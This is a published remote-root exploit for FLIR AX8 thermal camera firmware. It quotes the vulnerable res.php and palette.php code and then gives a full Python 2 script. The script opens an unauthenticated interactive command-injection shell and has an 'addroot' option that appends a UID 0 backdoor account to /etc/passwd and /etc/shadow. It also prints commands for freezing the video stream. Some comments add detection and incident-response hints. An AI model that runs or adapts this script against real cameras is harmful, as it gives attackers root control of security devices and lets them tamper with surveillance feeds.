FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
来源:https://www.zeroscience.mk 作者:LiquidWorm 发布时间:2018-10-16  
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5491
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
 
# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated
# command injection vulnerabilities. Several HTTP GET/POST parameters are
# passed unsanitized to the shell_exec function in the res.php and palette.php
# files. In the excerpts below, the request value is concatenated straight
# into the command string, with no escapeshellarg() call or allow-list check.
# This can be exploited to inject arbitrary system commands and gain root
# remote code execution.
 
# /FLIR/usr/www/res.php:
# ----------------------
# 1. <?php
# 2.   if (isset($_POST["action"])) {
# 3.     switch ($_POST["action"]) {
# 4.       case "get":
# 5.         if(isset($_POST["resource"]))
# 6.         {
# 7.           switch ($_POST["resource"]) {
# 8.             case ".rtp.hflip":
# 9.               if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
# 10.                $result = "false";
# 11.                break;
# 12.              }
# 13.              $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
# 14.              break;
# 15.            case ".rtp.vflip":
# 16.              if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
# 17.                $result = "false";
# 18.                break;
# 19.              }
# 20.              $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
# 21.              break;
# 22.            default:
# 23.              $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
# 24.          }
# 25.        }
 
# /FLIR/usr/www/palette.php:
# --------------------------
# 1. <?php
# 2.   if(isset($_POST["palette"])){
# 3.     shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
# 4.     echo json_encode(array("success"));
# 5.   }
# 6. ?>
 
 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
import requests
import colorama
import random##
import time####
import json####
import sys#####
import os######
 
# Script name as invoked; used only to build the usage message below.
piton = os.path.basename(sys.argv[0])
 
# At least one positional argument (<ip:port>) is required; its format is not
# validated here. The print statement makes this Python 2 code.
if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
    sys.exit()
 
# Cosmetic start-up banner; it has no bearing on the requests sent later.
bannah = """
.---------------------------------.
|         1984 Pictures           |
|                                 |
|            presents             |
|                  ___            |
|                [|   |=|{)__     |
|                 |___| \/   )    |
|                  /|\      /|    |
|                 / | \     | \\   |
.---------------------------------.
"""
print bannah
# Hold the banner on screen for four seconds, then clear the local terminal.
# os.system() receives a constant string, so no user-supplied text reaches
# the local shell at this point.
time.sleep(4)
os.system('clear')
 
print '\nFLIR AX8 Thermal Camera Remote Root Exploit'
print 'By Zero Science Lab'
 
# ASCII-art logo; printed below with a randomly chosen colour per character.
ICU = '''
                ````````               
           `./+ooosoooooo+/.`          
        `.+ss+//:::::::://+ss+.`       
       -oyo/::::-------:::::/oyo-      
     `/yo+:::-------.------:::+oy/`    
    `+yo+::---...........----:/+oy+`   
   `/yo++/--...../+oo+:....---:/+oy/`  
   `ss++//:-.../yhhhhhhy/...-://++ss`  
   .ho++/::--.-yhhddddhhy-.--:://+oh.  
   .ho+//::---/mmmmmmmmmm:---::/++oh.  
   `ss++//::---+mNNNNNNm+---:://++ss`  
   `/yo+//:::----+syys+-----://++oy/`  
    `+yo++//:::-----------:://++oy+`   
     `/yo++///:::::-:::::://+++oy/`    
       .oyo+++////////////+++oyo.      
        `.+ssoo++++++++++ooss+.`       
           `./+osssssssso+/.`          
                ````````               
'''
 
# Every attribute value found on colorama.Fore (its foreground escape codes).
colors = list(vars(colorama.Fore).values())
# `random` is used for decoration only; nothing security-relevant depends on it.
colored_chars = [random.choice(colors) + char for char in ICU]
 
print(''.join(colored_chars))
 
print
# Operator hints only: these lines print text and send nothing to the device.
# The hint text names /FLIR/usr/bin/freeze as the on-device command that
# freezes or unfreezes the stream, i.e. command execution on the camera also
# puts the integrity of the image feed at risk.
print '\x1b[1;37;44m'+'To freeze the stream run:   '+'\x1b[0m'+' /FLIR/usr/bin/freeze on'
print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n'
 
# The two keywords listed here are handled inside the main loop further down.
print '[*] Additional commands:'
print ' [+] \'addroot\' for add root user.'
print ' [+] \'exit\' for exit.\n'
 
# Interactive loop (Python 2: raw_input and the print statement). Every line
# typed at the prompt becomes one HTTP POST to the device; no credentials are
# sent, matching the "unauthenticated" description in the header.
while True:
 
    # Plain-HTTP URL built directly from the command-line argument.
    zeTargets = 'http://'+sys.argv[1]+'/res.php'
    # The prompt only imitates a root shell on the device; input is read locally.
    zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m')
    # Fixed request headers. For detection: the User-Agent and Accept-Language
    # values are constants, and 'Connection-Type' is not a standard header
    # name (Content-Type was presumably intended), so unmodified copies of
    # this script leave a recognisable pattern in HTTP traffic.
    zeHeaders = {'Cache-Control'   : 'max-age=0',
                 'User-Agent'      : 'thricer/251.4ev4h',
                 'Accept'          : 'text/html,application/xhtml+xml',
                 'Accept-Encoding' : 'gzip, deflate',
                 'Accept-Language' : 'mk-MK,mk;q=1.7',
                 'Connection'      : 'close',
                 'Connection-Type' : 'application/x-www-form-urlencoded'}
    # Form body matching the res.php excerpt in the header: action=get with a
    # `resource` value that matches none of the listed cases reaches the
    # default branch, where it is appended to the shell_exec() command line.
    # The leading ';' ends the intended `rls -o` command. A `resource` field
    # that starts with a shell metacharacter is therefore a strong indicator
    # wherever request bodies are inspected.
    zePardata = {'action'          : 'get',
                 'resource'        : ';'+zeCommand}
 
    try:
 
        # No timeout and no status-code check; the body is parsed as JSON.
        # NOTE: the request is sent before the 'exit'/'addroot' keywords are
        # examined, so those keywords are also transmitted as `resource`.
        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
        print json.loads(zeRequest.text)
 
        # sys.exit() raises SystemExit, which the `except Exception` below
        # does not intercept.
        if zeCommand.strip() == 'exit':
            sys.exit()
 
        # 'addroot' uses the second injection point, palette.php. Its excerpt
        # in the header shows the `palette` value appended to shell_exec() and
        # a fixed "success" reply, so no command output comes back ("blind").
        if zeCommand.strip() == 'addroot':
            print '[+] Blind command injection using palette.php...'
            print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...'
 
            nuTargets = 'http://'+sys.argv[1]+'/palette.php'
            # Same dict object as zeHeaders (an alias, not a copy).
            nuHeaders = zeHeaders
 
            # Backslash-escaped bytes that the device-side `echo -e` expands.
            # They spell a shadow entry beginning `roOt:$1$` (the MD5-crypt
            # prefix) and end with LF CR.
            nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31'
                         '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f'
                         '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d'
                         '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45'
                         '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67'
                         '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36'
                         '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39'
                         '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a'
                         '\\x3a\\x3a\\x0a\\x0d')
 
            # Two form bodies: a UID 0 / GID 0 account line appended to
            # /etc/passwd and the matching line appended to /etc/shadow.
            # For incident response on a suspect camera: look for a 'roOt'
            # entry in both files and for POSTs to /palette.php whose
            # `palette` field contains ';'.
            nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'}
            nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'}
 
            # Both responses are discarded, so "Success!" below is printed
            # whether or not the writes actually happened.
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)
            time.sleep(2)
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)
            
            print '[*] Success!\n'
        else: pass
 
    # Any error (connection failure, non-JSON response body, ...) prints a
    # generic message and ends the session.
    except Exception:
        print '[*] Error!'
        break
 
sys.exit()
 